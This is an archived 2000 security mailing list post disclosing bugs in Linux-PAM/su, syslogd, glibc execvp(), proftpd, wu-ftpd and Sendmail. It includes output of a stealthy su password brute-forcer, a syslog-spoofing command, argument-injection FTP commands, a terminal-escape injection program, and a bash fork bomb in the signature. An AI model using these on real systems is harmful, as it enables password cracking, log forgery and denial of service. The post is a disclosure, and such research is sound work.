Vulnerability Development mailing list archives
bruterh.sh & syslogd & [g]libc & proftpd & wu-ftpd & sendmail
From: lcamtuf () AGS PL (Michal Zalewski)
Date: Sun, 23 Jan 2000 13:47:39 +0100
This post describes / demonstrates bugs in: - Linux-PAM implementation (password cracking) - syslogd daemon (spoofing) - glibc execvp() function (undesirable behaviour) - proftpd (SEGV) - wu-ftpd (passing arbitrary parameters to three external programs) - Sendmail (junk characters in queue) No reason to panic. =================== 1. PAM/su on RedHat =================== Known? Dunno. But works. RedHat - NothingInLogs[tm] BruteForce(R) Password Crack ------------------------------------------------------- - (c) 1999/2000, Michal Zalewski <lcamtuf () ids pl> - [+] Configured against user 'testy', wordfile: words [+] Kill-delay set to 300000 usecs... [+] Destination account is alive and well... [+] /bin/su seems to be executable and setuid, hopefully it works... [+] Let's go straight to number one... [+] Wordfile 'words' loaded - 4 passwords... [+] Estimated time: 0 secs, max: 1 secs. [?] Trying 'testy' (3/4)... [*] Huh, it worked. I've tried password 'testy' for 'testy'. [+] Time wasted: 0 seconds. [+] Thank You, and hope you enjoyed your stay. ===================== 2. syslogd / syslog() ===================== Unix syslogd gets 'raw' log entries from o+w /dev/log socket, while date, priority and so on are added by user-end library function, syslog(). Very, very clever. Get command-line socket connectivity tool at http://lcamtuf.hack.pl/pliki/uc.c, then try: bash$ echo -ne 'XXX YY AA:BB:CC kernel - hax0red\0' | uc /dev/log (ctrl+c) Well-known? Hope so, anyway it's time to think about getpeeruid() or to change permissions on syslog socket. ======================= 3. glibc - execvp() bug ======================= glibc 2.0.x (dunno about other versions?) execvp() is buggy - first, it tries execve() on given program in directories specified in PATH, but then, if it gets ENOEXEC (executable format error), it tries to treat it just like a shell script, calling /bin/sh -c filename. Might result in strange/undesirable behaviour: $ cat >'-c' <<EOF anything EOF $ chmod 755 -- -c $ cat >nic.c <<EOF main() { execlp("-c","call_me_jane","id",0); } EOF $ gcc nic.c $ PATH=$PATH:: $ ./a.out uid=500(lcamtuf) gid=500(lcamtuf) groups=500(lcamtuf),2(daemon),80(network) ===================== 4. proftpd / mod_ls.c ===================== Due to missing * in modules/mod_ls.c around line 760, pointer to another pointer is incremented, instead of incrementing referenced pointer. Result: SEGV. Seems to be not exploitable, as this pointer to pointer is passed as first parameter of _parse_options function, while second parameter to this function is hard-coded 0x80, and all we have is read fault when isblank(*0x80) is called. Aaah, example? Quote 'LIST X' (note: it is 'LIST(space)(space)X') while talking to ftpd daemon on remote side. ======================= 5. wu-ftpd popen() bugs ======================= [lcamtuf@www lcamtuf]$ ftp localhost Connected to localhost. 220 www.XXXXX.pl FTP server (lcamtuf) ready. Name (localhost:lcamtuf): lcamtuf 331 Password required for lcamtuf. Password: 230 User lcamtuf logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> put "smyk" "--help" local: smyk remote: --help 200 PORT command successful. 150 Opening BINARY mode data connection for --help. 226 Transfer complete. 321 bytes sent in 0.000243 secs (1.3e+03 Kbytes/sec) ftp> quote site checksum "--help" 200 Usage: /bin/md5sum [OPTION] [FILE]... ftp> ls "--version" 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. ls (GNU fileutils) 3.16 226 Transfer complete. ..unfortunately, /bin/md5sum, /bin/cksum nor /bin/ls haven't any interesting options (like: 'use external program X', or 'dump output to file X'), and I can't see any overflows/bugs in it. Btw. 'quote site checksum existing_file' on RedHat machines causes ftpd daemon to hang, because there's no md5sum/cksum in /bin (but in /usr/bin instead). 6. Sendmail and non-ascii characters in queue. Simply, try it: -- queue_boo.c -- main() { printf("Type '.', then 'mailq' (works with TERM=linux).\n"); execl("/usr/sbin/sendmail", "sendmail", "-O", "DeliveryMode=d", "lp(\033[2J\033[0H\033[1m* 0WNED BOX *\033[0;30m)", 0); } -- EOF -- Stupid. _______________________________________________________________________ Michal Zalewski * [lcamtuf () ags pl] <> [AGS WAN] * [dione.ids.pl SYSADM] [Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};: [voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 603 110 160] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] <HR NOSHADE> <UL> <LI>APPLICATION/X-SH attachment: stored </UL>
Current thread:
- Re: Secure coding in C (was Re: Administrivia #4883), (continued)
- Re: Secure coding in C (was Re: Administrivia #4883) Marc Esipovich (Jan 21)
- Generalized List of Threats and Vulnerabilities Dave Drake (Jan 21)
- Re: Generalized List of Threats and Vulnerabilities Seth R Arnold (Jan 21)
- Re: Generalized List of Threats and Vulnerabilities Crispin Cowan (Jan 23)
- Re: Generalized List of Threats and Vulnerabilities John Duksta (Jan 21)
- Administrivia #5218 Blue Boar (Jan 21)
- Re: Administrivia #5218 Imran Ghory (Jan 22)
- Re: Administrivia #5218 kjkotas (Jan 22)
- Re: Administrivia #5218 Granquist, Lamont (Jan 24)
- Re: Administrivia #5218 Bob Fiero (Jan 22)
- bruterh.sh & syslogd & [g]libc & proftpd & wu-ftpd & sendmail Michal Zalewski (Jan 23)
- things to break.. Inedag () AOL COM (Jan 23)
- CGI insecurities hypoclear - lUSt - (Linux Users Strike Today) (Jan 23)
- HTTP scanners? Scorpus Kahn (Jan 15)
- Re: HTTP scanners? Seth R Arnold (Jan 24)
- Re: CGI insecurities David Taylor (Jan 23)
- Re: CGI insecurities Blue Boar (Jan 23)
- Re: things to break.. Matthew S. Hallacy (Jan 23)
- Re: things to break.. Jeff Bachtel (Jan 23)
- Re: things to break.. Matt Conover (Jan 24)
- Re: things to break.. Jordan Ritter (Jan 25)